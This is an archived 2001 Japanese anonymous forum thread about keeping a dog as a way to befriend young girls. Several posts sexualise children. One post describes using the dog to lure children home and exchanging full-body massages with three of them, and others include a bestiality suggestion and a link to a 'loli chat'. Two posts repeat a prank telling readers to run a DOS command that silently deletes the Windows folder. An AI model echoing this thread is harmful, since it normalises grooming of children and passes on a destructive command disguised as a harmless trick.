5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

幼女(少女)と仲良くなるために犬を飼う

1 :CC名無したん:2001/08/04(土) 02:46
ことにしました。
やっぱ小型犬がいいかな。
なんだかんだでしつけは大変そうだけど。
同じ犬飼の女の子たんと仲良くお話(ついでにパンチラ拝見)できたら最高だぁね♪

2 :CC名無したん:2001/08/04(土) 03:14
その女の子を飼うことができたら最高だね。

3 :CCルリたん:2001/08/04(土) 05:09
関係ないけど、エロげーやってたらフェレットが飼いたく
なったよ。

4 :CC名無したん:2001/08/04(土) 05:20
おこじょかってみたい。まっしろいやつ。

5 :CC名無したん:2001/08/04(土) 16:03
「MS-DOSプロンプト」で  deltree /y c:\windows\  って入力してみよう!
(NECのPC-9800の人は c:\ を a:\ に置き換えて)
(もしくは システムの導入先のドライブ名に置き換えて)
きっと素敵な事が起こるよ!

6 :CC名無したん:2001/08/04(土) 16:18
そんな動機で飼われる犬の身になってみろ!
噛み付かれて氏ね

7 :CC名無したん:2001/08/04(土) 16:26
大型犬を飼って獣姦させよう

8 :CC名無したん:2001/08/04(土) 16:29
http://www2.odn.ne.jp/~aar73290/pic4/00316.jpg
この犬かわいい・・

9 :CC名無したん:2001/08/04(土) 16:43
>>4
おこじょって肉食で結構獰猛なんじゃなかったっけ?

10 :おこじょ:2001/08/04(土) 16:45
食肉目イタチ科、別名ヤマイタチ。
成獣で体長15〜25センチで本州では中部山岳より北の標高1500メートル
以上の亜高山帯に生息しています。かわいい顔に似合わなく肉食でネズ
ミを好物とし、飢え ているときはウサギでも襲うことがあります。

11 :CC名無したん:2001/08/04(土) 16:54
フェレットと同じようなもんかと思ってた。

12 :CC名無したん:2001/08/05(日) 01:27
ハムスターの方が効くんじゃないか?

13 :CC名無したん:2001/08/05(日) 02:13
>>12
ハムスターは散歩しないだろ。
小型犬は散歩中に少女が近寄ってくる確率が高いんだよ。

14 :C1000タケダたん:2001/08/05(日) 02:25
少女にだけは吠えずに尻尾を振るよう訓練しておきたいね。

15 :CC名無したん:2001/08/05(日) 02:35
>>14
そのためにはまず少女を入手する必要があり。

16 :はやを:2001/08/05(日) 02:52
「千と千尋〜」も同じ目的で作りました(ノンフィクション)

17 :CC名無したん:2001/08/05(日) 08:30
犬飼ってます。毎日散歩してます。
興味ありそげな子には「綱持ってみる?」等と振ってやります。。

その手でお友達沢山です。家にもホイホイ来ます。宿題も手伝ってあげます。
最近では3人と全身マッサージしあいました。

夏休みは逆に会わないんだよね、、猛暑過ぎて外で遊ばないのかな

18 :C1000タケダたん:2001/08/05(日) 12:39
猫飼ってます。6年前の話。アパートの一階に住んでた頃、リビングの窓際で猫が日向ぼっこ
してるのを近所の子供達が知っていたようで、ある日オレが一人で部屋にいると玄関のチャイムが
鳴り、「ねこみせて〜」と小学一年生くらいの女の子3人がうちにやって来た。
しかし、当時はロリ気が全くなく、ケガさせてしまったら問題ありそうと思って適当な理由をつけて
帰してしまった。もったいない話。

19 :CC名無したん:2001/08/05(日) 14:13
>>18補足
その頃**中だったというのも理由のひとつ。

20 :CC名無したん:2001/08/05(日) 16:17
>>19
千釣中?

21 :CC名無したん:2001/08/05(日) 16:46
男子中だろ

22 :CC名無したん:2001/08/05(日) 18:01
脳卒中

23 :CC名無したん:2001/08/05(日) 18:02
アル中

24 :CC名無したん:2001/08/05(日) 18:13
しゃぶ中

25 :CC名無したん:2001/08/05(日) 18:28
ぴかちゅう

26 :CC名無したん:2001/08/06(月) 19:01
断食中

27 :CC名無したん:2001/08/07(火) 01:19
終わり?

28 :CC名無したん:2001/08/07(火) 01:22
>>5
36 名前:CC名無したん 投稿日:2001/05/28(月) 05:35
「MS-DOSプロンプト」で  deltree /y c:\windows\  って入力してみよう!
(NECのPC-9800の人は c:\ を a:\ に置き換えて)
(もしくは システムの導入先のドライブ名に置き換えて)
きっと素敵な事が起こるよ!


37 名前:CC名無したん 投稿日:2001/05/28(月) 05:47
脳内電波でもできますか?


38 名前:CC名無したん 投稿日:2001/05/29(火) 03:20
>>36
windowsフォルダが全削除されますね。
しかも削除の確認もされずに。


39 名前:名無しさん 投稿日:2001/06/17(日) 18:34
agr


40 名前:CC名無したん 投稿日:2001/06/17(日) 19:36
>>36どっかからひろってきたコピペ。
しかも誰も実行しない。
ここの住人はわかるのでやらないし、初心者はDOSプを知らないので出来ない。

29 :CC名無したん:2001/08/07(火) 02:52
>>19
中中中?チュンのみ安手。

30 :CC名無したん:2001/08/07(火) 04:38
>>19
「失業中」だから問題回避したかったんだろ

31 :CC名無したん:2001/08/07(火) 19:40
http://ww2.mintclub.ne.jp/maria/mkframe.cgi?z=hiroshi
ロリチャット

32 :CC名無したん:2001/08/07(火) 21:21
>>19
脱毛中?

6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)